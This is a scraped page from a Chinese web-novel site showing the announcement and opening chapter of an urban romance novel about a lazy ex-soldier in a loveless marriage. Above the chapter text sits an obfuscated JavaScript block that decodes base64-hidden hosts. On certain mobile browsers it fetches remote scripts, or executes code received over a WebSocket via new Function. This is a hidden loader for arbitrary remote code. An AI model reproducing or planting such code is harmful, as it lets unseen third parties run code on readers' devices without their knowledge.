笔趣阁

字:
关灯 护眼
笔趣阁 > 女总裁的近身兵王 > 新书公告,以及第一章
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

新书公告,以及第一章

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
中海,玲珑酒店,萧轻宇赤着上身,下身披着一条浴巾,站在窗前,面前的床上,一张熟睡的容颜,带着几分满足和疲惫。
  
  萧轻宇的嘴角,勾起一抹淡淡的笑容,阎罗公子从来不缺少暖床的女人,但是,这个女人还是给了他足够的惊艳,一个身材样貌无一不完美的女人。
  
  当初偷看Y国皇室那个娘们洗澡,被皇室的近卫队整整追杀了三天三夜,而这个女人,只用了五瓶红酒而已,相比之下,的确太容易了一些。
  
  一声嘤咛声传来,林晓雅睁开眼睛,阳光稍显的刺眼,用手遮挡住朦胧的眼神,下一刻,意识到昨夜发生的事儿,林晓雅猛然惊醒。
  
  一个男人的身影映入眼帘,赤着上身,古铜色的肌肤,呈流线型,给人一种充满力量的感觉,但是,却不失美感。
  
  这个男人的身材很完美,但是,却布满着密密麻麻的伤疤,很难想象,一个生活在和平年代的男人,怎么会拥有这么多的伤疤,一时之间,因为昨夜的冲动,林晓雅莫名的感到有几分后悔。
  
  或许,不该对自己这般的不负责任。
  
  “醒了!”萧轻宇淡淡的说道!慵懒,带着磁性的声音响起。
  
  林晓雅别过头去,不想理会这个夺走她最珍贵的东西的男人。无论承认与否,对于这个男人,林晓雅的情绪,不免有些复杂,毕竟,他夺走了她最珍贵的东西。
  
  “抱歉,昨夜太疯狂的一些,那是因为你太完美!”萧轻宇淡淡的说道!虽然在道歉,但是,却没有一点歉意,反而给人一种漫不经心的感觉,嘴里叼着一根香烟,稍显的痞气。
  
  “昨夜,只是各取所取而已,都是成年人了,你不会幼稚的以为,我们还会继续下去吧?”强自镇定之后,林晓雅冷哼一声,她意识到,这个男人很危险,让她有一种迫不及待的想要逃离的感觉。
  
  “如你所愿,我没有强迫女人的习惯!”萧轻宇漫不经心的说道!
  
  一双眸子,带着几分难言的慵懒!
  
  他从不喜欢强迫女人,更不会纠缠一个女人。
  
  “记住了,昨夜的事儿就当没发生过,不然你会死的很难看!”萧轻宇的身影走到门前的时候,林晓雅冰冷的声音传来。
  
  萧轻宇脚步一顿,随即,直接离开,他最不怕的就是麻烦,不过,他还是打算尊重这个女人的意愿,他没兴趣把这事儿到出乱说!
  
  紫枫别墅区,中海最显赫的小区之一,不知道有多少人梦想在这里得到一套房子,因为能住在这里的人,非富即贵,他们属于食物链顶端的那一撮人。
  
  出租车停下,萧轻宇半眯着眼睛,懒洋洋的向里面走,“萧少,回来了?”门前的保安恭敬的招呼道!
  
  “嗯,”萧轻宇懒洋洋的点点头,在保安的目光的注视下走进小区。
  
  “男人啊!在有本事,都及不上娶一个好老婆。”保安看着萧轻宇的背影,咂咂嘴说道!语气之中,不无羡慕。
  
  谁能想到这个漫不经心一脸慵懒做什么事儿似乎都提不起兴致的男人,竟然取了华东商界第一美女林若雪。
  
  顶级的白富美,不知道让多少人艳羡。
  
  家门前,拿着钥匙的萧轻宇此刻却在踌躇,不知被多少人艳羡的生活,事实上远远没有想象中的那么美好。
  
  如人饮水,冷暖自知,林若雪漂亮的无可挑剔不假,但是,那张冷艳的脸蛋,不是谁都能整日面对的,这也是萧轻宇习惯了夜不归宿的原因,外面的那些野花自然比不上家里的这朵玫瑰,华东商界的第一美女岂是浪得虚名,可惜,这朵玫瑰是冰的,只能看不能吃。
  
  踌躇了一下,萧轻宇打开房门,一张冷艳的脸蛋映入眼帘,林若雪也第一时间看到了萧轻宇,眼睛永远是那副半睁不睁的样子,似乎什么事儿都不放在心上,每一次见了,都让林若雪有一种难以抑制的愤怒。
  
  她不记得这是这个家伙第几次夜不归宿了,不过,似乎已经习惯了,两人的婚姻,本就名存实亡。
  
  若不是家里的逼迫,她一定会让这个男人滚的远远的,最好永远不要出现在她的视线之中。
  
  “早,”萧轻宇招呼了一声,两人像房客多过像夫妻。
  
  林若雪没好气的瞪了萧轻宇一眼,没有理会萧轻宇的招呼,在沙发上直起身子,大抵是坐的太久的缘故,血脉有些不畅,不由伸了一个懒腰,在这一瞬间,曲线毕露,萧轻宇慵懒的眼神,陡然变的璀璨。
  
  不得不说,家里这个冰块的身材还真是完美的无可挑剔。
  
  “你看什么?”林若雪面对萧轻宇灼热的目光,没好气的问道!
  
  “看球!”萧轻宇一本正经的说道!
  
  林若雪闻言,不由气结,这就是一个丧心病狂的王八蛋。
  
  “一手难以掌握啊!”萧轻宇咂咂嘴,虽然跟家里的这块冰块有老死不相往来的意思,但是,偶尔调戏一下,看着对方亦嗔薄怒的样子,未必不是一种乐趣。
  
  “嗯?”林若雪皱眉,貌似,没有那么大啊!
  
  “别误会,我说的是俩。”萧轻宇耸耸肩。
  
  “其实,这个尺寸,刚刚好!”萧轻宇轻咳一声,一本正经的说道!
  
  “滚!”林若雪没好气的骂道!
  
  “记得,今天去上班,本小姐不想养一个米虫!”林若雪冷冷的说道!
  
  “哦,‘萧轻宇漫不经心的点点头,“对了,给我安排的什么职位?高管还是哪个部的经理?”萧轻宇问道!
  
  “高管?经理?你以为公司是你家开的?”林若雪闻言,不禁没好气的说道!这个家伙,难道不知道自己有几斤几两吗?
  
  “公司可不就是咱家开的吗!”萧轻宇咧嘴一笑。
  
  “去死,王八蛋!”林若雪气急!
  
  没想到,这么点漏洞被这个混蛋抓到了。
  
  萧轻宇耸耸肩,自顾的进了厨房,林若雪轻叹一声,这个家伙,唯一的优点大抵就是从来不会对她发火了,无论她的语气怎么激烈,怎么恶毒,这个家伙就是不会生气,对别人来说,或许是有点,但是,对林若雪来说,未尝不是一种折磨。
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师